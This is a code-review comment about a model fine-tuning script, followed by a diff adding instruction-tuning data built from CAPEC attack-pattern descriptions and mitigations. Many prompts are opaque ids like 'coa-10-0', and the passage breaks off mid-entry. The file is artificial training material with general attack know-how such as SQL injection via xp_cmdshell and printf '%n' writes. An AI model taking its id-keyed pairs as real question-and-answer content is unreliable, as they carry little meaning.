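Review bot: The base model and tokenizer are pulled from the Hub by mutable name only (`BASE_MODEL = "decapoda-research/llama-7b-hf"` with no `revision=`), so whatever is at that name at run time is what gets loaded, and if the repository ships pickle-based `.bin` shards rather than safetensors (as this one historically did), `from_pretrained` deserialises them with torch's pickle loader and any tampered shard runs arbitrary code in the training process. Pin the checkpoint and prefer the non-executable format: `model = LlamaForCausalLM.from_pretrained(BASE_MODEL, revision="<pinned commit sha>", use_safetensors=True, load_in_8bit=True, torch_dtype=torch.float16, device_map="auto")` and `tokenizer = LlamaTokenizer.from_pretrained(BASE_MODEL, revision="<pinned commit sha>")` (drop `use_safetensors` if the installed transformers is older than the version that accepts it, but keep the pin). In `load_all_mitre_dataset`, `json.load(open(file))` never closes the handle and will raise `KeyError` on any `.json` under the walked tree that is not a STIX bundle; use `with open(file, encoding="utf-8") as fh: data = json.load(fh)` and `for object_data in data.get("objects", []):`. In `formal_dataset`, the bare `except: pass` silently drops every object without a `description` and also hides unrelated errors; narrow it to `except KeyError: continue` so the record count printed afterwards means what it appears to.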
@@ -0,0 +1 @@ +[{"instruction": "What is", "input": "Accessing Functionality Not Properly Constrained by ACLs", "output": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to."}, {"instruction": "What is", "input": "coa-1-0", "output": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n "}, {"instruction": "What is", "input": "Buffer Overflow via Environment Variables", "output": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. 
This attack leverages implicit trust often placed in environment variables."}, {"instruction": "What is", "input": "coa-10-0", "output": "Do not expose environment variable to the user."}, {"instruction": "What is", "input": "coa-10-1", "output": "Do not use untrusted data in your environment variables."}, {"instruction": "What is", "input": "coa-10-2", "output": "Use a language or compiler that performs automatic bounds checking"}, {"instruction": "What is", "input": "coa-10-3", "output": "There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow."}, {"instruction": "What is", "input": "Overflow Buffers", "output": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice."}, {"instruction": "What is", "input": "coa-100-0", "output": "Use a language or compiler that performs automatic bounds checking."}, {"instruction": "What is", "input": "coa-100-1", "output": "Use secure functions not vulnerable to buffer overflow."}, {"instruction": "What is", "input": "coa-100-2", "output": "If you have to use dangerous functions, make sure that you do boundary checking."}, {"instruction": "What is", "input": "coa-100-3", "output": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution."}, {"instruction": "What is", "input": "coa-100-4", "output": "Use OS-level preventative functionality. 
Not a complete solution."}, {"instruction": "What is", "input": "coa-100-5", "output": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software."}, {"instruction": "What is", "input": "Server Side Include (SSI) Injection", "output": "An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands."}, {"instruction": "What is", "input": "coa-101-0", "output": "Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them"}, {"instruction": "What is", "input": "coa-101-1", "output": "All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive"}, {"instruction": "What is", "input": "coa-101-2", "output": "Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead"}, {"instruction": "What is", "input": "Session Sidejacking", "output": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. 
Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token."}, {"instruction": "What is", "input": "coa-102-0", "output": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel."}, {"instruction": "What is", "input": "coa-102-1", "output": "Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks."}, {"instruction": "What is", "input": "Clickjacking", "output": "An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system."}, {"instruction": "What is", "input": "coa-103-0", "output": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames."}, {"instruction": "What is", "input": "coa-103-1", "output": "Turn off JavaScript, Flash and disable CSS."}, {"instruction": "What is", "input": "coa-103-2", "output": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. 
Finish working with the target system and logout first before proceeding to other tasks."}, {"instruction": "What is", "input": "Cross Zone Scripting", "output": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security."}, {"instruction": "What is", "input": "coa-104-0", "output": "Disable script execution."}, {"instruction": "What is", "input": "coa-104-1", "output": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone"}, {"instruction": "What is", "input": "coa-104-2", "output": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone"}, {"instruction": "What is", "input": "coa-104-3", "output": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum"}, {"instruction": "What is", "input": "coa-104-4", "output": "Ensure proper HTML output encoding before writing user supplied data to the page"}, {"instruction": "What is", "input": "HTTP Request Splitting", "output": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) 
to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n "}, {"instruction": "What is", "input": "coa-105-0", "output": "Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies."}, {"instruction": "What is", "input": "coa-105-1", "output": "Configuration: front-end HTTP agents notice ambiguous requests."}, {"instruction": "What is", "input": "coa-105-2", "output": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection."}, {"instruction": "What is", "input": "coa-105-3", "output": "Configuration: Disable reuse of back-end connections."}, {"instruction": "What is", "input": "coa-105-4", "output": "Configuration: Use HTTP/2 for back-end connections."}, {"instruction": "What is", "input": "coa-105-5", "output": "Configuration: Use the same web server software for front-end and back-end server."}, {"instruction": "What is", "input": "coa-105-6", "output": "Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses."}, {"instruction": "What is", "input": "coa-105-7", "output": "Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. 
proxies and web servers)"}, {"instruction": "What is", "input": "coa-105-8", "output": "Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process."}, {"instruction": "What is", "input": "coa-105-9", "output": "Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."}, {"instruction": "What is", "input": "DEPRECATED: XSS through Log Files", "output": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site Scripting\". Please refer to these CAPECs going forward."}, {"instruction": "What is", "input": "Cross Site Tracing", "output": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server."}, {"instruction": "What is", "input": "coa-107-0", "output": "Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default."}, {"instruction": "What is", "input": "coa-107-1", "output": "Patch web browser against known security origin policy bypass exploits."}, {"instruction": "What is", "input": "Command Line Execution through SQL Injection", "output": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. 
The malicious data escapes that data plane by spawning new commands to be executed on the host."}, {"instruction": "What is", "input": "coa-108-0", "output": "Disable MSSQL xp_cmdshell directive on the database"}, {"instruction": "What is", "input": "coa-108-1", "output": "Properly validate the data (syntactically and semantically) before writing it to the database."}, {"instruction": "What is", "input": "coa-108-2", "output": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument)."}, {"instruction": "What is", "input": "Object Relational Mapping Injection", "output": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). 
While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible."}, {"instruction": "What is", "input": "coa-109-0", "output": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework"}, {"instruction": "What is", "input": "coa-109-1", "output": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application."}, {"instruction": "What is", "input": "Cause Web Server Misclassification", "output": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process."}, {"instruction": "What is", "input": "coa-11-0", "output": "Implementation: Server routines should be determined by content not determined by filename or file extension."}, {"instruction": "What is", "input": "SQL Injection through SOAP Parameter Tampering", "output": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. 
This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message."}, {"instruction": "What is", "input": "coa-110-0", "output": "Properly validate and sanitize/reject user input at the service provider."}, {"instruction": "What is", "input": "coa-110-1", "output": "Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query."}, {"instruction": "What is", "input": "coa-110-2", "output": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly."}, {"instruction": "What is", "input": "JSON Hijacking (aka JavaScript Hijacking)", "output": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website."}, {"instruction": "What is", "input": "coa-111-0", "output": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). 
Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce."}, {"instruction": "What is", "input": "coa-111-1", "output": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags)."}, {"instruction": "What is", "input": "coa-111-2", "output": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session."}, {"instruction": "What is", "input": "coa-111-3", "output": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario."}, {"instruction": "What is", "input": "Brute Force", "output": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset."}, {"instruction": "What is", "input": "coa-112-0", "output": "Select a provably large secret space for selection of the secret. 
Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space."}, {"instruction": "What is", "input": "coa-112-1", "output": "Use a secret space that is well known and with no known patterns that may reduce functional size."}, {"instruction": "What is", "input": "coa-112-2", "output": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext."}, {"instruction": "What is", "input": "Interface Manipulation", "output": "An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way."}, {"instruction": "What is", "input": "Authentication Abuse", "output": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. 
In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker."}, {"instruction": "What is", "input": "Authentication Bypass", "output": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place."}, {"instruction": "What is", "input": "Excavation", "output": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes."}, {"instruction": "What is", "input": "coa-116-0", "output": "Minimize error/response output to only what is necessary for functional use or corrective language."}, {"instruction": "What is", "input": "coa-116-1", "output": "Remove potentially sensitive information that is not necessary for the application's functionality."}, {"instruction": "What is", "input": "Interception", "output": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. 
However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient."}, {"instruction": "What is", "input": "coa-117-0", "output": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties."}, {"instruction": "What is", "input": "Choosing Message Identifier", "output": "This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one."}, {"instruction": "What is", "input": "coa-12-0", "output": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n "}, {"instruction": "What is", "input": "coa-12-1", "output": "Re-architect system input/output channels as appropriate to distribute self-protecting data. 
That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them."}, {"instruction": "What is", "input": "Double Encoding", "output": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target."}, {"instruction": "What is", "input": "coa-120-0", "output": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input."}, {"instruction": "What is", "input": "coa-120-1", "output": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding."}, {"instruction": "What is", "input": "coa-120-2", "output": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. 
Instead, use the \"POST method whenever possible."}, {"instruction": "What is", "input": "coa-120-3", "output": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process."}, {"instruction": "What is", "input": "coa-120-4", "output": "Refer to the RFCs to safely decode URL."}, {"instruction": "What is", "input": "coa-120-5", "output": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive."}, {"instruction": "What is", "input": "coa-120-6", "output": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)."}, {"instruction": "What is", "input": "Exploit Non-Production Interfaces", "output": "\n An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.\n "}, {"instruction": "What is", "input": "coa-121-0", "output": "Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments."}, {"instruction": "What is", "input": "Privilege Abuse", "output": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. 
Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources."}, {"instruction": "What is", "input": "coa-122-0", "output": "Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts."}, {"instruction": "What is", "input": "Buffer Manipulation", "output": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory."}, {"instruction": "What is", "input": "coa-123-0", "output": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. 
Finally, there may be operating system level preventative functionality that can be applied."}, {"instruction": "What is", "input": "Shared Resource Manipulation", "output": "An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications."}, {"instruction": "What is", "input": "Flooding", "output": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. 
The greater this number, the more likely an attack is to succeed against a given target."}, {"instruction": "What is", "input": "coa-125-0", "output": "Ensure that protocols have specific limits of scale configured."}, {"instruction": "What is", "input": "coa-125-1", "output": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits."}, {"instruction": "What is", "input": "coa-125-2", "output": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed."}, {"instruction": "What is", "input": "Path Traversal", "output": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files."}, {"instruction": "What is", "input": "coa-126-0", "output": "Design: Configure the access control correctly."}, {"instruction": "What is", "input": "coa-126-1", "output": "Design: Enforce principle of least privilege."}, {"instruction": "What is", "input": "coa-126-2", "output": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. 
Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution."}, {"instruction": "What is", "input": "coa-126-3", "output": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement. Canonicalize the supplied path (decode any encoding and resolve symbolic links) before validating it, then confirm that the resolved path still lies inside the intended base directory."}, {"instruction": "What is", "input": "coa-126-4", "output": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host."}, {"instruction": "What is", "input": "coa-126-5", "output": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands."}, {"instruction": "What is", "input": "coa-126-6", "output": "Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin."}, {"instruction": "What is", "input": "coa-126-7", "output": "Implementation: Perform input validation for all remote content, including remote and user-generated content."}, {"instruction": "What is", "input": "coa-126-8", "output": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."}, {"instruction": "What is", "input": "coa-126-9", "output": "Implementation: Use indirect references rather than actual file names."}, {"instruction": "What is", "input": "coa-126-10", "output": "Implementation: Use the most restrictive file-access permissions possible when developing and deploying web applications."}, {"instruction": "What is", "input": "coa-126-11", "output": "Implementation: Validate user input by only accepting known good. 
Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach."}, {"instruction": "What is", "input": "Directory Indexing", "output": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks."}, {"instruction": "What is", "input": "coa-127-0", "output": "1. Using blank index.html: putting a blank index.html simply prevents directory listings from displaying to site visitors. Note that this only hides the listing; files in the directory remain retrievable by anyone who knows or guesses their names."}, {"instruction": "What is", "input": "coa-127-1", "output": "2. Preventing with .htaccess in Apache web server: In .htaccess, write \"Options -Indexes\". The same directive can be placed in the main server configuration, which does not depend on AllowOverride being enabled."}, {"instruction": "What is", "input": "coa-127-2", "output": "3. Suppressing error messages: return the same response for a 403 \"Forbidden\" as for a 404 \"Not Found\", so that the existence of a directory cannot be inferred from the error."}, {"instruction": "What is", "input": "Integer Attacks", "output": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. 
Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number due to the structure of integer storage formats. (In C and C++ signed overflow is undefined behavior, so the result is not even guaranteed to wrap, and compilers may remove overflow checks written in terms of the wrapped value.)"}, {"instruction": "What is", "input": "Pointer Manipulation", "output": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks."}, {"instruction": "What is", "input": "Subverting Environment Variable Values", "output": "The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary."}, {"instruction": "What is", "input": "coa-13-0", "output": "Protect environment variables against unauthorized read and write access."}, {"instruction": "What is", "input": "coa-13-1", "output": "Protect the configuration files which contain environment variables against illegitimate read and write access."}, {"instruction": "What is", "input": "coa-13-2", "output": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."}, {"instruction": "What is", "input": "coa-13-3", "output": "Apply the least privilege principles. 
If a process has no legitimate reason to read an environment variable do not give that privilege."}, {"instruction": "What is", "input": "Excessive Allocation", "output": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request."}, {"instruction": "What is", "input": "coa-130-0", "output": "Limit the amount of resources that are accessible to unprivileged users."}, {"instruction": "What is", "input": "coa-130-1", "output": "Assume all input is malicious. 
Consider all potentially relevant properties when validating input."}, {"instruction": "What is", "input": "coa-130-2", "output": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed."}, {"instruction": "What is", "input": "coa-130-3", "output": "Use resource-limiting settings, if possible."}, {"instruction": "What is", "input": "Resource Leak Exposure", "output": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests."}, {"instruction": "What is", "input": "coa-131-0", "output": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that are no longer reachable). Note that garbage collection does not prevent leaks of non-memory resources such as file handles, sockets, or threads; those must still be released explicitly."}, {"instruction": "What is", "input": "coa-131-1", "output": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)"}, {"instruction": "What is", "input": "coa-131-2", "output": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function."}, {"instruction": "What is", "input": "Symlink Attack", "output": "An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name."}, {"instruction": "What is", "input": "coa-132-0", "output": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them. A separate check followed by an open is itself subject to a time-of-check/time-of-use race, so prefer atomic open flags such as O_CREAT|O_EXCL and O_NOFOLLOW where the platform supports them."}, {"instruction": "What is", "input": "coa-132-1", "output": "Implementation: Use randomly generated file names for temporary files. 
Give the files restrictive permissions, and create them atomically with a helper such as mkstemp rather than checking for existence and then creating them."}, {"instruction": "What is", "input": "Try All Common Switches", "output": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality."}, {"instruction": "What is", "input": "coa-133-0", "output": "Design: Minimize switch and option functionality to only that necessary for correct function of the command."}, {"instruction": "What is", "input": "coa-133-1", "output": "Implementation: Remove all debug and testing options from production code."}, {"instruction": "What is", "input": "Email Injection", "output": "An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol."}, {"instruction": "What is", "input": "Format String Injection", "output": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting characters. For example, in certain functions of the C programming language such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string, and the formatting character %n writes the number of bytes output so far into the memory location passed as the corresponding argument, which turns the bug into an arbitrary memory write. 
